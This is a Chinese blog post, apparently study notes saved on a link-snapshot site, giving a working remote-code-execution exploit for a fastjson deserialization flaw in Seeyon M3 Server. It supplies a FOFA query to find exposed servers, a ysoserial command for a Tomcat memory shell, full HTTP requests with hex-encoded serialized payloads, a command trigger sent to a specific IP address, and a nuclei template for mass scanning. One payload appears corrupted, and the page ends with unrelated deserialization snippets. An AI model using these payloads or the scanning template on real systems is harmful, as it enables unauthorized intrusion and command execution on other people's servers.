添加链接
link管理
链接快照平台
  • 输入网页链接,自动生成快照
  • 标签化管理网页链接

免责声明:

本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

致远M3 server中 mobile_portal接口处存在fastjson反序列化漏洞,漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中,然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。

fofa语句

title="M3-Server"

使用ysoserial生成TomcatCmdEcho回显内存马

java -jar ysoserial-all.jar CommonsBeanutils192NOCC "CLASS:TomcatCmdEcho"

然后将生成的内容进行hex编码

处理去除空格换行

构造payload,将生成的可替换hex处

POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 8956
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/json
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
[{"userMessageId":"{\"@\u0074\u0079\u0070\u0065\":\"\u0063\u006f\u006d\u002e\u006d\u0063\u0068\u0061\u006e\u0067\u0065\u002e\u0076\u0032\u002e\u0063\u0033\u0070\u0030\u002e\u0057\u0072\u0061\u0070\u0070\u0065\u0072\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0050\u006f\u006f\u006c\u0044\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\",\"\u0075\u0073\u0065\u0072\u004f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0073\u0041\u0073\u0053\u0074\u0072\u0069\u006e\u0067\":\"\u0048\u0065\u0078\u0041\u0073\u0063\u0069\u0069\u0053\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0064\u004d\u0061\u0070:0873726a6176612e7574696c2e5072696f726974795175657565b130373f594973697a654c0d0a636f6d70617261746f72744c6a6176612f7574696c2f436f6d70617261746f723b787073722b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f726a267322ee4c0d0a636f6d70617261746f72717e70726f7065727479744c6a6176612f6c616e672f537472696e673b787073722a6a6176612e6c616e672e537472696e672443617365496e73656e736974697665436f6d70617261746f72775c7d5c50267870746f757470757450726f706572746965737773723a636f6d2e5f696e64656e744e756d626572495f7472616e736c6574496e6465785b2e78736c74632e747261782e54656d706c61746573496d706c2020574f98c633490d0a5f62797465636f646573745b5b425b5f636c617373745b4c6a6176612f6c616e672f436c6173733b4c5f6e616d65717e4c5f6f757470757450726f70657274696573744c6a6176612f7574696c2f50726f706572746965733b7870f5f5f5f575725b5b424b3f67673f787075725b420e543f787043813f330d0a453f3f3f3f3f3f7a0d0a3f3f3f3f7b0d0a3f3f3f203f3f3f3f3f583f3f703f3f3f3f3f3f3f3f3f3f3f203f3f253f3f253f3f3f3f203f3f3f3f3f3f3f3f303f303f3f3f2f3f3f2f3f2f3f203f3f3f640d0a3f3f3f3f3f3f3c696e69743e282956436f64654c696e654e756d6265725461626c654c6f63616c5661726961626c655461626c65746869732c4c79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f3b2020207472616e73666f726d72284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29646f63756d656e742d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d68616e646c657273425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0d0a457863657074696f6e733f3f4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b296974657261746f72354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b68616e646c6572414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723c636c696e69743e65204c6a6176612f6c616e672f4e6c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723c636c696e69743e65204c6a6176612f6c616e672f4e6f537563684669656c64457863657074696f6e3b636c734c6a6176612f6c616e672f436c6173733b76617235214c6a6176612f6c616e672f4e6f537563684d6574686f64457863657074696f6e3b636d64735b4c6a6176612f6c616e672f537472696e673b726573756c745b42202020202020202070726f636573736f724c6a6176612f6c616e672f4f626a6563743b726571726573706a49744c6a6176612f6c616e672f5468726561643b7374724c6a6176612f6c616e672f537472696e673b6f626a0d0a70726f636573736f72734c6a6176612f7574696c2f4c6973743b4c6a6176612f6c616e672f457863657074696f6e3b69666c61675a67726f75704c6a6176612f6c616e672f54687265616447726f75703b664c6a6176612f6c616e672f7265666c6563742f4669656c643b746872656164735b4c6a617661537461636b4d61705461626c653f3f3f3f3f3f3f623f3f0d0a536f7572636546696c65546f6d636174436d644563686f2e6a6176610d0a46473f3f3f3f3f3f3f3f3f3f3f3f3f3f3f3f657865630d0a3f3f687474707461726765746a6176612f6c616e672f52756e6e61626c657468697324306a6176612f6c616e672f4e6f537563684669656c64457863657074696f6e0d0a3f3f676c6f62616c6a6176612f7574696c2f4c6973740d0a3f3f3f3f0d0a676574526573706f6e73656a6176612f6c616e672f436c6173730d0a3f3f6a6176612f6c616e672f4f626a6563743f3f3f2020206765744865616465726a6176612f6c616e672f537472696e67636d640d0a3f3f2020202020207365745374617475730d0a3f5e6a6176612f6c616e672f496e74656765720d0a463f6f732e6e616d653f3f3f3f3f77696e636d642e6578652f632020202020202f62696e2f626173682d636a6176612f7574696c2f5363616e6e65726a6176612f6c616e672f50726f636573734275696c6465720d0a463f3f3f3f3f3f463f5c410d0a3f3f3f3f3f3f246f72672e6170616368652e746f6d6361742e7574696c2e6275662e427974654368756e6b0d0a3ff50d0a73656d6361742e7574696c2e6275662e427974654368756e6b0d0a3ff50d0a73657442797465730d0a3f646f57726974656a6176612f6c616e672f4e6f537563684d6574686f64457863657074696f6e6a6176612e6e696f2e42797465427566666572777261706a6176612f6c616e672f457863657074696f6e2a79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f40636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c657439636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863757272656e7454687265616428294c6a6176612f6c616e672f5468726561643b67657454687265616447726f757028294c6a6176612f6c616e672f54687265616447726f7570676574436c61737328294c6a6176612f6c616e672f436c6173733b6765744465636c617265644669656c642d284c6a61766765745375706572636c61737373697a652829492849294c6a6176612f6c616e672f4f626a6563743b4c6a6176612f6c6765744d6574686f6440284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b6a6176612f6c616e672f7265666c6563742f4d6574686f64696e766f6b6539284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b6973456d70747928295a54595045284929566a6176612f6c616e672f53797374656d0d0a67657450726f706572747926284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b0d0a746f4c6f77657243617365285b4c6a6176612f6c616e672f537472696e673b2956737461727428294c6a6176612f6c616e672f50726f636573733b6a6176612f6c616e672f50726f63657373676574496e70757453747265616d28294c6a6176612f696f2f496e70757453747265616d3b284c6a6176612f696f2f496e70757453747265616d3b29560d0a75736544656c696d6974657227284c6a6176612f6c616e672f537472696e673b294c6a6176612f7574696c2f5363616e6e65723b6e6578676574427974657328295b42666f724e616d6525284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0d0a6e6577496e7374616e636528294c6a6176612f6c616e672f4f626a6563743b6765744465636c617265644d6574686f643879736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f31353536393230373939343230303a4c79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f31353536393230373939343230303b2144454647482f2a3f3f49204a0d0a4b4d4e483f3f49574a204b4f50515253544d5548493f495c4a2a4b4f5056575859535a47483f3b3f3f4c2b3f3f4d2c3f2c2b3f20202020203f202020202020204e362db23f323a3f3f3f3f0d0a3a0d0a3f0d0a3f0d0a3f3f3f3f3f4d2c3f2c3a3f3f3f783f3f4d2c3f2c3a3f3f4d3f3f3f3f3f4d2c3f2c3a3f3f3f4d3f3f3f4d2c3f2c3a3f3f4d2c3f2c3f3f3620202020202020203f3f3f2020202020203f202020202020203f3a0d0a0d0a3f3f4d2c3f2c0d0a3a0d0a0d0a3f2e3f0d0a3f3f3a0d0a0d0a3f3f20533f0d0a3f5921533f3f203a3f573f223f4f0d0a3f233f3f24533f0d0a3f593f25596e26533f57273f283f292a3f0d0a3f313f323f333f34353f363f373f383a393f3a3a3f3b3a3c3f3d53593f2453593f24533f3e3f5953593f25593f2653593f2559c926533f570d0a3f3f3f533f0d0a3f59533f573f4e3a413f3a3a423f3d533f3e3f59533f3a0d0a3f3f3f533f0d0a3f59533f573b2e3f242e343c435a656a2e723f3f3f203f233f213f223f243f253f273f2a3f283f293f2b3f2c3f2d3f2e3f2f7d3f3f433f3f43493f3f0d0a302632313336343e3557367d373f383f393f3a3c2e3d213e643f3f443f403f413f423f433f453f473f303f493f4c3f4a3f4b3f3f503f4f3f514a3f3f5b3f0d0a3f6364263f65665d5e3f495f603f3f61620d0a3e3f67660d0a573f68660d0a3f696a2020202020343f6b6c433f6d6e72786f660d0a3f703f5b72273f736a3f7475202020203f76773f7879243f7a7b7c7c3ff5277d7e202020202020203f3f2eac3f226a3f5d3f3f2d3f3f3f3f3f373f3f7d7e2020202020202020ac3f3f3f3f3f3f3d9e4a3f3f3ff57d7e20202020202020423ff5423f3f72717e41813f330d0a0d0a0d0a6f6e7374616e7456616c756571963f6d473c696e69743e282956436f64654c696e654e756d6265725461626c654c6f63616c5661726961626c655461626c6574686973466f6f0d0a496e6e6572436c6173736573254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b0d0a536f7572636546696c650d0a476164676574732e6a6176610d0a0d0a0d0a2e2379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f6a6176612f6c616e672f4f626a6563746a6176612f696f2f53657269616c697a61626c6579736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473212e0d0a0d0a0d0a3f2a3f3f0d0a0d0a782020202020202070515153424849464470202020202020705151534248494644707778717e;\"}|","channelId":"111","title":"111","content":"222","deviceType":"androidphone","serviceProvider":"baidu","deviceFirm":"other"}]

然后利用其命令执行

GET /mobile_portal/api/systemLog/pns/loadLog/app.log HTTP/1.1
Host:1.119.202.150:9999
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
cmd:whoami

我burp发包没有反应,最后是用hackbar成功的

nuclei批量验证

id: ZhiYuan-m3server-mobile_portal-rce
info:
  name: 致远M3server反序列化RCE漏洞
  author: changge
  severity: critical
  description: '致远M3 server中 mobile_portal接口处发现了fastjson反序列化漏洞,漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中,然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。'
  tags: 2023,seeyon,m3server,rce
  metadata:
    max-request: 3
    fofa-query: title="M3-Server"
    verified: true
http:
  - raw:
        POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Content-Type: application/json
        [{"userMessageId":"{\"@\u0074\u0079\u0070\u0065\":\"\u0063\u006f\u006d\u002e\u006d\u0063\u0068\u0061\u006e\u0067\u0065\u002e\u0076\u0032\u002e\u0063\u0033\u0070\u0030\u002e\u0057\u0072\u0061\u0070\u0070\u0065\u0072\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0050\u006f\u006f\u006c\u0044\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\",\"\u0075\u0073\u0065\u0072\u004f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0073\u0041\u0073\u0053\u0074\u0072\u0069\u006e\u0067\":\"\u0048\u0065\u0078\u0041\u0073\u0063\u0069\u0069\u0053\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0064\u004d\u0061\u0070:aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72e3a188ea7322a4480200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372002a6a6176612e6c616e672e537472696e672443617365496e73656e736974697665436f6d70617261746f7277035c7d5c50e5ce02000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e00200007870000014afcafebabe0000003301050a004500890a008a008b0a008a008c0a001d008d08007a0a001b008e0a008f00900a008f009107007b0a008a00920800930a002000940800950800960700970800980800580700990a001b009a08009b08007007009c0b0016009d0b0016009e08006708009f0700a00a001b00a10700a20a00a300a40800a50700a60800a70a002000a80800a909002500aa0700ab0a002500ac0800ad0a00ae00af0a002000b00800b10800b20800b30800b40800b50700b60700b70a003000b80a003000b90a00ba00bb0a002f00bc0800bd0a002f00be0a002f00bf0a002000c00800c10a001b00c20a001b00c30800c40700640a001b00c50800c60700c70800c80800c90700ca0701030700cc0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301002c4c79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f3b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e730700cd0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100083c636c696e69743e010001650100204c6a6176612f6c616e672f4e6f537563684669656c64457863657074696f6e3b010003636c730100114c6a6176612f6c616e672f436c6173733b010004766172350100214c6a6176612f6c616e672f4e6f537563684d6574686f64457863657074696f6e3b010004636d64730100135b4c6a6176612f6c616e672f537472696e673b010006726573756c740100025b4201000970726f636573736f720100124c6a6176612f6c616e672f4f626a6563743b010003726571010004726573700100016a01000149010001740100124c6a6176612f6c616e672f5468726561643b0100037374720100124c6a6176612f6c616e672f537472696e673b0100036f626a01000a70726f636573736f72730100104c6a6176612f7574696c2f4c6973743b0100154c6a6176612f6c616e672f457863657074696f6e3b01000169010004666c61670100015a01000567726f75700100174c6a6176612f6c616e672f54687265616447726f75703b010001660100194c6a6176612f6c616e672f7265666c6563742f4669656c643b010007746872656164730100135b4c6a6176612f6c616e672f5468726561643b01000d537461636b4d61705461626c650700ce0700cf0700d00700a60700a207009907009c0700620700c70700ca01000a536f7572636546696c65010012546f6d636174436d644563686f2e6a6176610c004600470700d00c00d100d20c00d300d40c00d500d60c00d700d80700cf0c00d900da0c00db00dc0c00dd00de010004657865630c00df00e0010004687474700100067461726765740100126a6176612f6c616e672f52756e6e61626c6501000674686973243001001e6a6176612f6c616e672f4e6f537563684669656c64457863657074696f6e0c00e100d6010006676c6f62616c01000e6a6176612f7574696c2f4c6973740c00e200e30c00db00e401000b676574526573706f6e736501000f6a6176612f6c616e672f436c6173730c00e500e60100106a6176612f6c616e672f4f626a6563740700e70c00e800e90100096765744865616465720100106a6176612f6c616e672f537472696e67010003636d640c00ea00eb0100097365745374617475730c00ec005e0100116a6176612f6c616e672f496e74656765720c004600ed0100076f732e6e616d650700ee0c00ef00f00c00f100de01000377696e010007636d642e6578650100022f630100092f62696e2f626173680100022d630100116a6176612f7574696c2f5363616e6e65720100186a6176612f6c616e672f50726f636573734275696c6465720c004600f20c00f300f40700f50c00f600f70c004600f80100025c410c00f900fa0c00fb00de0c00fc00fd0100246f72672e6170616368652e746f6d6361742e7574696c2e6275662e427974654368756e6b0c00fe00ff0c0100010101000873657442797465730c010200e6010007646f577269746501001f6a6176612f6c616e672f4e6f537563684d6574686f64457863657074696f6e0100136a6176612e6e696f2e42797465427566666572010004777261700100136a6176612f6c616e672f457863657074696f6e01002a79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c6574010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e0100156a6176612f6c616e672f54687265616447726f75700100176a6176612f6c616e672f7265666c6563742f4669656c640100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b01000e67657454687265616447726f757001001928294c6a6176612f6c616e672f54687265616447726f75703b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b01000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000d6765745375706572636c61737301000473697a650100032829490100152849294c6a6176612f6c616e672f4f626a6563743b0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100076973456d70747901000328295a01000454595045010004284929560100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f77657243617365010016285b4c6a6176612f6c616e672f537472696e673b2956010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b010018284c6a6176612f696f2f496e70757453747265616d3b295601000c75736544656c696d69746572010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f7574696c2f5363616e6e65723b0100046e657874010008676574427974657301000428295b42010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b01000b6e6577496e7374616e636501001428294c6a6176612f6c616e672f4f626a6563743b0100116765744465636c617265644d6574686f6401003979736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f39383334393531333839303130323301003b4c79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f3938333439353133383930313032333b002100440045000000000004000100460047000100480000002f00010001000000052ab70001b100000002004900000006000100000009004a0000000c000100000005004b010400000001004d004e000200480000003f0000000300000001b100000002004900000006000100000057004a00000020000300000001004b0104000000000001004f0050000100000001005100520002005300000004000100540001004d005500020048000000490000000400000001b10000000200490000000600010000005c004a0000002a000400000001004b0104000000000001004f005000010000000100560057000200000001005800590003005300000004000100540008005a004700010048000005d500080011000002fd033bb80002b600034c2bb600041205b600064d2c04b600072c2bb60008c00009c000094e03360415042dbea202cd2d1504323a051905c70006a702b91905b6000a3a061906120bb6000c9a000d1906120db6000c9a0006a7029b1905b60004120eb600064d2c04b600072c1905b600083a071907c1000f9a0006a702781907b600041210b600064d2c04b600072c1907b600083a071907b600041211b600064da700163a081907b60004b60013b600131211b600064d2c04b600072c1907b600083a071907b60004b600131214b600064da700103a081907b600041214b600064d2c04b600072c1907b600083a071907b600041215b600064d2c04b600072c1907b60008c00016c000163a0803360915091908b900170100a201cb19081509b9001802003a0a190ab600041219b600064d2c04b600072c190ab600083a0b190bb60004121a03bd001bb6001c190b03bd001db6001e3a0c190bb60004121f04bd001b5903122053b6001c190b04bd001d5903122153b6001ec000203a061906c601571906b600229a014f190cb60004122304bd001b5903b2002453b6001c190c04bd001d5903bb0025591100c8b7002653b6001e571227b80028b60029122ab6000c99001906bd00205903122b535904122c535905190653a7001606bd00205903122d535904122e5359051906533a0dbb002f59bb003059190db70031b60032b60033b700341235b60036b60037b600383a0e1239b8003a3a0f190fb6003b3a07190f123c06bd001b5903123d535904b20024535905b2002453b6003e190706bd001d5903190e535904bb00255903b70026535905bb002559190ebeb7002653b6001e57190cb60004123f04bd001b5903190f53b6001c190c04bd001d5903190753b6001e57a7004e3a0f1241b8003a3a101910124204bd001b5903123d53b6003e191004bd001d5903190e53b6001e3a07190cb60004123f04bd001b5903191053b6001c190c04bd001d5903190753b6001e57043b1a990006a70009840901a7fe2f1a990006a70011a700083a05a70003840401a7fd32a700044bb10008009500a000a3001200c300d100d400120213028602890040002e003902ed0043003c005702ed0043005a007a02ed0043007d02e702ed0043000002f802fb004300030049000000fe003f0000000d0002000e0009000f001300100018001100240012002e001400340015003c001600430017005a001800650019006a001a0072001b007d001c0088001d008d001e0095002000a0002300a3002100a5002200b6002400bb002500c3002700d1002a00d4002800d6002900e1002b00e6002c00ee002d00f9002e00fe002f010c0030011b0031012600320131003301360034013e003501570036017d0037018a003801b5003901f0003a0213003c021a003d0221003e0264003f0286004402890040028b00410292004202b2004302d4004502d6004702dd003002e3004902ea004c02ed004a02ef004b02f2001202f8005002fb004f02fc0051004a000000d4001500a50011005b005c000800d6000b005b005c0008021a006c005d005e000f02920042005d005e0010028b0049005f0060000f01f000e600610062000d021300c300630064000e012601b700650066000a013e019f00670066000b0157018600680066000c010f01d40069006a0009003402b6006b006c0005004302a7006d006e000600720278006f00660007010c01de00700071000802ef0003005b00720005002702d10073006a0004000202f6007400750000000902ef007600770001001302e5007800790002002402d4007a007b0003007c000000a80017ff002700050107007d07007e070009010000fc001407007ffc001a07008002fc002207008165070082125d0700820cfd002d07008301fe00cb07008107008107008152070084ff009a000f0107007d07007e0700090107007f0700800700810700830107008107008107008107008407003d0001070085fb004af90001f80006fa0005ff000600050107007d07007e0700090100004207008604ff0005000000004207008600000100870000000200887571007e0010000001d4cafebabe00000033001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d000000060001000000c7000e0000000c000100000005000f001200000002001300000002001400110000000a00010002001600100009707400084448434e57504c53707701007871007e000d78;\"}|","channelId":"111","title":"111","content":"222","deviceType":"androidphone","serviceProvider":"baidu","deviceFirm":"other"}]
        GET /mobile_portal/api/systemLog/pns/loadLog/app.log HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        cmd: whoami
    matchers:
      - type: dsl
          - "status_code_1 == 200 && contains((body_1), 'Success') && status_code_2 == 200 && contains((body_1), '\')"

微信公众号:AY长歌

github poc总汇地址: https://github.com/AYcg/poc

1、序列化 序列化se ria lize() 序列化说通俗点就是把一个对象变成可以传输的字符串,序列化的目的是方便数据的传输和存储。在PHP应用中,序列化和 反序列化 一般用做缓存,比如session缓存,cookie等。 常见的序列化格式: 二进制格式 json字符串 xml字符串 比如下面是一个对象: class S{ public $test="pikachu"; $s=new S(); //创建一个对象 se ria lize($s import javax.servlet.ServletException; import javax.servlet.annotation. Web Servlet; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.io.B 但可以发现下面直接调用了toString方法,所以我们直接截取利用链的后一半, 反序列化 ObjectBean并调用toString即可 package com.summer.rome; import com.summer.util.Se ria lizeUtil; import com.sun.org.apache.xalan.internal.xsl Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–> 反序列化 。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成 反序列化 RCE 漏洞 使用docker复现漏洞环境 docker pull medicean/vula...
致远 m3 - server 存在 反序列化 RCE 漏洞,攻击者可以利用此漏洞在远程服务器上执行恶意代码。为了复现这个漏洞,我们可以按照以下步骤进行: 1. 确认漏洞版本:首先需要确定目标服务器上的 致远 m3 - server 版本是否存在漏洞。可以通过查看官方公告或漏洞报告来确认。 2. 搭建测试环境:在本地搭建一个与目标服务器相似的测试环境,可以使用虚拟机或Docker等工具来模拟目标服务器环境。 3. 准备利用工具:准备一个适用于该漏洞的利用工具,例如 ysose ria l等,用于构造恶意的 反序列化 payload。 4. 发起攻击:利用准备好的利用工具构造恶意payload,然后向目标服务器发送恶意请求,触发漏洞并执行恶意代码。 5. 验证漏洞利用:在攻击成功后,可以通过查看服务器日志或执行一些系统命令来验证是否成功执行了恶意代码。 6. 报告漏洞:一旦成功复现了漏洞,需要及时向 致远 m3 - server 的官方或相关 安全 机构报告漏洞细节,以便及时修复和防范。 总的来说,复现 致远 m3 - server 反序列化 RCE 漏洞需要仔细分析漏洞利用的过程,同时要遵守相关法律法规,不得在未经授权的情况下攻击他人系统。
